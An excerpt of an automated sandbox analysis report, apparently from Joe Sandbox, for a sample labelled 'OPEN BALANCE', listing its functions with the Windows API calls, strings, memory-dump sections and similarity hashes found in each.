SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008D411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008D412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008D4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008D4145

Strings

Msctls_Progress32, xrefs: 008D40E3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a70750c4adef3ea692dfaad05456db48ac7c12c5ac443ad0eafce5bce55853ca
Instruction ID: 3763b62a5f5bdcf7199cfc585739a077759be0d55a7bd7efc73e83c506ca0eaa
Opcode Fuzzy Hash: a70750c4adef3ea692dfaad05456db48ac7c12c5ac443ad0eafce5bce55853ca
Instruction Fuzzy Hash: EC118EB2150219BEEF118E64CC86EE77F6DFF08798F004211BA18E2190CA729C61DBA4

Function 0087D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0087D7A3: _free.LIBCMT ref: 0087D7CC

_free.LIBCMT ref: 0087D82D

Part of subcall function 008729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000), ref: 008729DE
Part of subcall function 008729C8: GetLastError.KERNEL32(00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000,00000000), ref: 008729F0

_free.LIBCMT ref: 0087D838
_free.LIBCMT ref: 0087D843
_free.LIBCMT ref: 0087D897
_free.LIBCMT ref: 0087D8A2
_free.LIBCMT ref: 0087D8AD
_free.LIBCMT ref: 0087D8B8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 64e22fa3d59b564d2ee69709bd310175a9e6a0149737a38c95baaa1493eb2159
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 0B118B71940B04AADA21BFB8CC07FCBBBECFF40740F448825B29DE6096DA34F5459662

Function 008ADA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008ADA74
LoadStringW.USER32(00000000), ref: 008ADA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008ADA91
LoadStringW.USER32(00000000), ref: 008ADA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 008ADADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 008ADAB9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 6a0930a9365e87158a57f54268b529b8075670bd73e5665d6ea322594916d3f6
Instruction ID: 04e771f82e55306b17fc95a85887c311ca34f9afcc6b50ac9508c3f174c4568b
Opcode Fuzzy Hash: 6a0930a9365e87158a57f54268b529b8075670bd73e5665d6ea322594916d3f6
Instruction Fuzzy Hash: F10162F25002197FEB109BE49D89EEB376CF709305F400696F746E2041EA749E848F74

Function 008B096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(014FE3A8,014FE3A8), ref: 008B097B
RtlEnterCriticalSection.NTDLL(014FE388), ref: 008B098D
TerminateThread.KERNEL32(00000007,000001F6), ref: 008B099B
WaitForSingleObject.KERNEL32(00000007,000003E8), ref: 008B09A9
CloseHandle.KERNEL32(00000007), ref: 008B09B8
InterlockedExchange.KERNEL32(014FE3A8,000001F6), ref: 008B09C8
RtlLeaveCriticalSection.NTDLL(014FE388), ref: 008B09CF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: aa5f4b697e3c127b9c28a96f0970e217fc17159cab63a9b5bf8122de9933edd0
Instruction ID: 8eda1787574d974635c9fc98b79bf1b8a1a612bc20966d5232e9f41f6e227227
Opcode Fuzzy Hash: aa5f4b697e3c127b9c28a96f0970e217fc17159cab63a9b5bf8122de9933edd0
Instruction Fuzzy Hash: F6F0EC32483A13BBDB515FA4EE8DBD6BB39FF05702F402226F202908A1C7759465CF90

Function 008B7A96 Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 008B7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008B7B8F
SHGetDesktopFolder.SHELL32(?), ref: 008B7BA3
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008B7C74
SHBrowseForFolderW.SHELL32(?), ref: 008B7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008B7D7A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial
String ID:
API String ID: 2178115132-0
Opcode ID: feff9fbf391bd5c24a55dc9b87c9ab686cdc447a5fe9b5a24334a015423f4bf9
Instruction ID: 5f18c31c7fc71a2aa466dc84b86ffbb585d5a400c48085814e33f85576416cf1
Opcode Fuzzy Hash: feff9fbf391bd5c24a55dc9b87c9ab686cdc447a5fe9b5a24334a015423f4bf9
Instruction Fuzzy Hash: 7EC12B75A04209AFCB14DFA8C894DAEBBF9FF48314B1485A9E819DB361D730ED45CB90

Function 008701B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 008700BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008700D6
__allrem.LIBCMT ref: 008700ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0087010B
__allrem.LIBCMT ref: 00870122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00870140

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 044612cae9e2e5ca790d0a1fa8f41f0b07eff12769e2c5cdd7b30d222717a74d
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 7081F571A00B06DBE720AB6CDC41B6A73E9FF51324F25813AF515D6286EFB0D9008B51

Function 008761FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008682D9,008682D9,?,?,?,0087644F,00000001,00000001,8BE85006), ref: 00876258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0087644F,00000001,00000001,8BE85006,?,?,?), ref: 008762DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008763D8
__freea.LIBCMT ref: 008763E5

Part of subcall function 00873820: RtlAllocateHeap.NTDLL(00000000,?,00911444), ref: 00873852

__freea.LIBCMT ref: 008763EE
__freea.LIBCMT ref: 00876413

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: c31988a86778eb9d08a8259b2714562aa62e9f4f1e2265c768c67f8010a04836
Instruction ID: 5892a7a6c7e1202744257c0caee686cf620865a89ede6962266a0f1819a4b34e
Opcode Fuzzy Hash: c31988a86778eb9d08a8259b2714562aa62e9f4f1e2265c768c67f8010a04836
Instruction Fuzzy Hash: DC51F272A00A16ABEF258F64CC81EAF77A9FF44710F148229FC09D6259EB34DC60D761

Function 008CBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008CB6AE,?,?), ref: 008CC9B5
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CC9F1
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CCA68
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008CBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008CBD25
RegCloseKey.ADVAPI32(00000000), ref: 008CBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008CBD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 008CBDF3
RegCloseKey.ADVAPI32(?), ref: 008CBDFF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 5bbe9e7162bd3b347379aea8dd6d9359d13790136d23445248c0e13cf5262eb9
Instruction ID: 550e5b9b08bca0e27d257fde5abb0d1e600c32a7f630f5dcad38cd5577ecb450
Opcode Fuzzy Hash: 5bbe9e7162bd3b347379aea8dd6d9359d13790136d23445248c0e13cf5262eb9
Instruction Fuzzy Hash: D5817E70108645AFD714DF24C886E2ABBF5FF84308F14855DF55A8B2A2DB31ED45CB92

Function 0089F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0089F7B9
SysAllocString.OLEAUT32(00000001), ref: 0089F860
VariantCopy.OLEAUT32(0089FA64,00000000), ref: 0089F889
VariantClear.OLEAUT32(0089FA64), ref: 0089F8AD
VariantCopy.OLEAUT32(0089FA64,00000000), ref: 0089F8B1
VariantClear.OLEAUT32(?), ref: 0089F8BB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 1a8d3f6eeffcd928971c91cd41ca84f6752871db4856248ee5f2b6aa8f354e4f
Instruction ID: 26626c224bbe8c57327b0d6a751a33f053e96a81482b1c4f8c78a2673693af66
Opcode Fuzzy Hash: 1a8d3f6eeffcd928971c91cd41ca84f6752871db4856248ee5f2b6aa8f354e4f
Instruction Fuzzy Hash: 1A51A331600314BACF28BB69D895B69B7A5FF45324F289467EA06DF293DB708C40C797

Function 0085920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

BeginPaint.USER32(?,?,?), ref: 00859241
GetWindowRect.USER32(?,?), ref: 008592A5
ScreenToClient.USER32(?,?), ref: 008592C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008592D3
EndPaint.USER32(?,?,?,?,?), ref: 00859321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008971EA

Part of subcall function 00859339: BeginPath.GDI32(00000000), ref: 00859357

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: b8e7d19f4db665e7eff4b90c7578a5c31ad3ebebb4a21654cb45f2ca369aeebb
Instruction ID: 996670b6202f1749223a095d94984470d41f56108680106b710d84e29913b26b
Opcode Fuzzy Hash: b8e7d19f4db665e7eff4b90c7578a5c31ad3ebebb4a21654cb45f2ca369aeebb
Instruction Fuzzy Hash: 0941B030209301EFDB10DF28DC84FBA7BA8FB55365F040269FAA4C72A1C7309849DB62

Function 008B07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 008B080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 008B0847
RtlEnterCriticalSection.NTDLL(?), ref: 008B0863
RtlLeaveCriticalSection.NTDLL(?), ref: 008B08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008B08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 008B0921

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: c83cf88b91955a6e4b9a2396498b9021b174fbe2d8b220ab9217fb62006de905
Instruction ID: ec3f9c047340b54eb54a19287313b8ac79dd0421e33aa0bf1cf4bf479bcaeedb
Opcode Fuzzy Hash: c83cf88b91955a6e4b9a2396498b9021b174fbe2d8b220ab9217fb62006de905
Instruction Fuzzy Hash: 6E413671900205ABDF14AF58DC85AAA77B9FF04310F1440A5ED00EE297DB30DE65DBA5

Function 008D81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0089F3AB,00000000,?,?,00000000,?,0089682C,00000004,00000000,00000000), ref: 008D824C
EnableWindow.USER32(00000000,00000000), ref: 008D8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 008D82D1
ShowWindow.USER32(00000000,00000004), ref: 008D82E5
EnableWindow.USER32(00000000,00000001), ref: 008D830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008D832F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1bac98f93b157002c374171d8a2705afdfedaedededcdbc3c01c3b92b21d0e42
Instruction ID: 0314df2733fda7c903865fa83a40cf3f2a7b8da96426ba79236a00364fd73678
Opcode Fuzzy Hash: 1bac98f93b157002c374171d8a2705afdfedaedededcdbc3c01c3b92b21d0e42
Instruction Fuzzy Hash: B2418034605644EFDB25CF25DC99BE47BF1FB0A715F1843AAE6188B3A2CB31A841CB50

Function 008A7726 Relevance: 9.1, APIs: 6, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008A7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008A778F
SysAllocString.OLEAUT32(00000000), ref: 008A7792
SysAllocString.OLEAUT32(?), ref: 008A77B0
SysFreeString.OLEAUT32(?), ref: 008A77B9
SysAllocString.OLEAUT32(?), ref: 008A77EC

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$Free
String ID:
API String ID: 1313759350-0
Opcode ID: fcc4aa3d06c12931ffe95372ae6e0208c9f153fdc302be1010b17557c0c71415
Instruction ID: 552281624fd923dd046a1398479298b44e4b18dfd913f3a1538b32486c1ec893
Opcode Fuzzy Hash: fcc4aa3d06c12931ffe95372ae6e0208c9f153fdc302be1010b17557c0c71415
Instruction Fuzzy Hash: 2221B07660921AAFEF10DFA8CC88CBB73ACFB0A364B008126FA14DB151D670DC41D764

Function 008A77FD Relevance: 9.1, APIs: 6, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008A7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008A7868
SysAllocString.OLEAUT32(00000000), ref: 008A786B
SysAllocString.OLEAUT32 ref: 008A788C
SysFreeString.OLEAUT32 ref: 008A7895
SysAllocString.OLEAUT32(?), ref: 008A78BD

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$Free
String ID:
API String ID: 1313759350-0
Opcode ID: f88a1fdc45ec5411daa9bba6a4de05733227ab3625b670ba549dc0fb617b02bb
Instruction ID: 35edd72d582891dc88709f76901671bfe5200420ac9b3baa0bd493024c641e93
Opcode Fuzzy Hash: f88a1fdc45ec5411daa9bba6a4de05733227ab3625b670ba549dc0fb617b02bb
Instruction Fuzzy Hash: 0A21A431609109AFEB109FA8DC88DAA77ECFF09360B108135FA15CB2A5D678DC41DB68

Function 008A4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 008A4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008A4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008A4CEA
_wcslen.LIBCMT ref: 008A4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008A4D10
_wcsstr.LIBVCRUNTIME ref: 008A4D1A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

